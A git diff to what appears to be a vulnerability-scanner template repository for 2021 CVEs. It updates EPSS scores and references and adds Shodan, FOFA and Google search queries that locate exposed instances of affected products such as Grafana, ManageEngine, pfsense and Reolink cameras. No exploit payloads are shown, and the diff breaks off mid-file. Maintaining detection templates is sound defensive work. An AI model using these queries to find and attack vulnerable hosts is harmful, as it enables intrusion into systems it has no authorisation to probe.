52303c4a3f..3d92b2e17f 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -13,19 +13,21 @@ info: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ - https://nvd.nist.gov/vuln/detail/CVE-2021-36380 - https://www.sunhillo.com/product/sureline/ + - https://github.com/Ostorlab/KEV + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-36380 cwe-id: CWE-78 - epss-score: 0.97166 - epss-percentile: 0.99767 + epss-score: 0.97494 + epss-percentile: 0.99977 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sunhillo product: sureline - tags: cve2021,cve,sureline,rce,oast,sunhillo + tags: cve2021,cve,sureline,rce,oast,sunhillo,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 9b1384b83b..3daed29755 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -29,6 +29,8 @@ info: vendor: verint product: workforce_optimization shodan-query: title:"Verint Sign-in" + fofa-query: title="verint sign-in" + google-query: intitle:"verint sign-in" tags: cve2021,cve,xss,verint http: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 8aa4290aa7..7e66333de3 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3654 cwe-id: CWE-601 - epss-score: 0.92596 - epss-percentile: 0.98944 + epss-score: 0.92607 + epss-percentile: 0.98994 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index a64f0801ce..c64bd33fa8 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00233 - epss-percentile: 0.60652 + epss-percentile: 0.6129 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2021,cve,icewarp,redirect http: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index b0fbfc8323..091c47d40d 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 - epss-score: 0.0061 - epss-percentile: 0.78175 + epss-score: 0.00445 + epss-percentile: 0.74932 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index b104b46306..ce177301df 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37304 cwe-id: CWE-732 epss-score: 0.00703 - epss-percentile: 0.79899 + epss-percentile: 0.80284 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" + google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index cedd33c523..72ca741e39 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -28,6 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" + google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 7f39e871e9..2706cdd862 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37416 cwe-id: CWE-79 - epss-score: 0.00118 - epss-percentile: 0.44933 + epss-score: 0.00149 + epss-percentile: 0.51001 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: zohocorp product: manageengine_adselfservice_plus shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve2021,cve,zoho,xss,zohocorp http: diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 6719103fb9..3ee7325bae 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.69043 + epss-percentile: 0.69609 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 22a54ec1c7..6e86dbf827 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -14,13 +14,14 @@ info: - https://github.com/fengwenhua/CVE-2021-37580 - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb - http://www.openwall.com/lists/oss-security/2021/11/16/1 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 - epss-score: 0.91956 - epss-percentile: 0.9872 + epss-score: 0.92774 + epss-percentile: 0.99015 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index a7ffd6b5a4..c045da6fdf 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -15,13 +15,14 @@ info: - https://www.virtuasoftware.com.br/ - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br - https://nvd.nist.gov/vuln/detail/CVE-2021-37589 + - https://github.com/luca-regne/public-exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-37589 cwe-id: CWE-89 - epss-score: 0.00661 - epss-percentile: 0.77395 + epss-score: 0.0114 + epss-percentile: 0.84701 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: virtuasoftware product: cobranca shodan-query: http.favicon.hash:876876147 + fofa-query: icon_hash=876876147 tags: cve,cve2021,virtua,sqli,virtuasoftware http: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 424a0a1b8c..9930c91415 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2021-37704 cwe-id: CWE-668,CWE-200 - epss-score: 0.00547 - epss-percentile: 0.76969 + epss-score: 0.0062 + epss-percentile: 0.78796 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index b1532b1692..347f5ab75d 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -20,13 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-37833 cwe-id: CWE-79 - epss-score: 0.0019 - epss-percentile: 0.55493 + epss-score: 0.00287 + epss-percentile: 0.6875 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2021,cve,hoteldruid,xss,digitaldruid http: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 4b7c585909..c2fccad391 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-306,CWE-269 - epss-score: 0.01445 - epss-percentile: 0.8529 + epss-score: 0.01603 + epss-percentile: 0.87397 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve2021,cve,apache,airflow,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 4eb207348f..506d8feeaa 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 - http://www.cyberoamworks.com/NetGenie-Home.asp - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 - epss-score: 0.00626 - epss-percentile: 0.76687 + epss-score: 0.01053 + epss-percentile: 0.84023 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 4973f46fed..32919c3b3f 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.48901 + epss-score: 0.0015 + epss-percentile: 0.5117 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cliniccases product: cliniccases shodan-query: http.title:"ClinicCases",html:"/cliniccases/" + fofa-query: title="cliniccases",html:"/cliniccases/" + google-query: intitle:"cliniccases",html:"/cliniccases/" tags: cve,cve2021,xss,cliniccases http: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 5384a41c12..981649fa78 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.04786 - epss-percentile: 0.92528 + epss-score: 0.04209 + epss-percentile: 0.92226 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 + fofa-query: icon_hash=-1606065523 tags: cve,cve2021,cachet,sqli,chachethq http: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index bf41c7f981..c5a4ea9ab3 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -19,13 +19,16 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39211 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.00161 - epss-percentile: 0.51768 + epss-score: 0.00126 + epss-percentile: 0.47223 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: glpi-project product: glpi + shodan-query: http.title:"glpi" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2021,glpi,exposure,glpi-project http: diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 62889d9a0e..6ffd29adeb 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -27,6 +27,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,kev http: diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 77710a19be..9c48a5c1ab 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 - epss-score: 0.0021 - epss-percentile: 0.58322 + epss-score: 0.00228 + epss-percentile: 0.60903 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index dad8ac22ba..5bddc86dcb 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39433 - epss-score: 0.00637 - epss-percentile: 0.78687 + epss-score: 0.00688 + epss-percentile: 0.80055 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 82b8c6507e..5673dc3ced 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: eyoucms product: eyoucms + fofa-query: title="eyoucms" tags: cve2021,cve,redirect,eyoucms,cms http: diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 2a6f0f19df..adbe2c9f08 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -30,6 +30,8 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" + fofa-query: title="reolink" + google-query: intitle:"reolink" tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot http: diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 2cbbd16b00..739563d63a 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -30,6 +30,8 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" + fofa-query: title="reolink" + google-query: intitle:"reolink" tags: cve2021,cve,reolink,camera,exposure,iot http: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 59ab065e1c..bd5031e0cc 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 - epss-score: 0.03051 - epss-percentile: 0.90763 + epss-score: 0.03304 + epss-percentile: 0.91311 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cobbler_project product: cobbler + shodan-query: http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cve,cve2021,cobbler,rce,cobbler_project http: diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index e2fb207a28..c55c863ca9 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -17,14 +17,15 @@ info: cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 - epss-score: 0.97372 - epss-percentile: 0.99897 + epss-score: 0.97446 + epss-percentile: 0.99948 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve2021,cve,ssrf,apache,mod-proxy,kev http: diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 21c1f7b32e..75165cd98f 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-706 - epss-score: 0.97499 - epss-percentile: 0.99976 + epss-score: 0.97492 + epss-percentile: 0.99975 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 vendor: zohocorp product: manageengine_adselfservice_plus + shodan-query: http.title:"manageengine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index d212ac1c29..f814c685c7 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -20,14 +20,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40542 cwe-id: CWE-79 - epss-score: 0.00643 - epss-percentile: 0.78811 + epss-score: 0.00342 + epss-percentile: 0.71484 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: os4ed product: opensis shodan-query: http.title:"openSIS" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve2021,cve,xss,opensis,os4ed http: diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index 0cb298f8fb..7b03ac2e4c 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -11,17 +11,22 @@ info: - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md - https://www.youtube.com/watch?v=wFwlbXANRCo - https://nvd.nist.gov/vuln/detail/CVE-2021-40651 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-40651 cwe-id: CWE-22 + epss-score: 0.02562 + epss-percentile: 0.90208 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:* metadata: max-request: 2 - product: opensis vendor: os4ed + product: opensis shodan-query: "title:\"openSIS\"" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve,cve2021,lfi,os4ed,opensis,authenticated http: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index cb5258cfc8..140ba31264 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -30,6 +30,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" + google-query: intitle:"geoserver" tags: cve2021,cve,ssrf,geoserver,osgeo http: diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 21c5ae0127..892fd6e7f5 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 - epss-score: 0.00379 - epss-percentile: 0.72411 + epss-score: 0.00464 + epss-percentile: 0.75425 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 1e3c7262f2..3882bb576c 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-23 - epss-score: 0.85536 - epss-percentile: 0.98294 + epss-score: 0.91719 + epss-percentile: 0.98896 cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: aviatrix product: controller + shodan-query: http.title:"aviatrix cloud controller" + fofa-query: title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload - variables: string: "CVE-2021-40870" diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 7eefb59c54..00709d33e3 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -28,6 +28,7 @@ info: vendor: gurock product: testrail shodan-query: http.html:"TestRail" + fofa-query: body="testrail" tags: cve2021,cve,exposure,gurock,testrail http: diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 9fdb9e476a..fea5baad9f 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40908 cwe-id: CWE-89 epss-score: 0.0161 - epss-percentile: 0.8612 + epss-percentile: 0.87425 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 6e545de39b..50a8575067 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40968 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.50482 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 3c7e768608..fa6db19a24 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 43da6c18c3..9d92f16b48 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 88dd6a8150..89c0bf68ef 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 3221950a2a..bc2ed51d6b 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 2ea1e563ed..3a356e0df3 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -28,6 +28,8 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" + fofa-query: title="spotweb - overview" + google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project http: diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index e72fc123b2..4373d3e6c5 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 - epss-score: 0.03461 - epss-percentile: 0.90554 + epss-score: 0.04239 + epss-percentile: 0.92255 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 3e9a39243d..f54de54a16 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -19,14 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 - epss-score: 0.96194 - epss-percentile: 0.99478 + epss-score: 0.96363 + epss-percentile: 0.99558 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2021,cve,grafana,xss http: diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 665b12ebb6..892ac67cf2 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -14,19 +14,21 @@ info: - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 - epss-score: 0.00805 - epss-percentile: 0.79795 + epss-score: 0.00807 + epss-percentile: 0.81699 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: redash product: redash shodan-query: http.favicon.hash:698624197 + fofa-query: icon_hash=698624197 tags: cve2021,cve,hackerone,redash,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 7729cab239..7ae351c658 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-22,CWE-200 - epss-score: 0.95622 - epss-percentile: 0.99363 + epss-score: 0.95556 + epss-percentile: 0.99393 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" + google-query: intitle:"metabase" tags: cve2021,cve,metabase,lfi http: diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 54567b4bd3..69b5afcdcd 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -28,6 +28,9 @@ info: max-request: 4 vendor: pfsense product: pfsense + google-query: intitle:"pfsense - login" + shodan-query: http.title:"pfsense - login" + fofa-query: title="pfsense - login" tags: cve2021,cve,pfsense,rce,authenticated http: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 3c29a1dada..62446f3bca 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -14,13 +14,14 @@ info: - 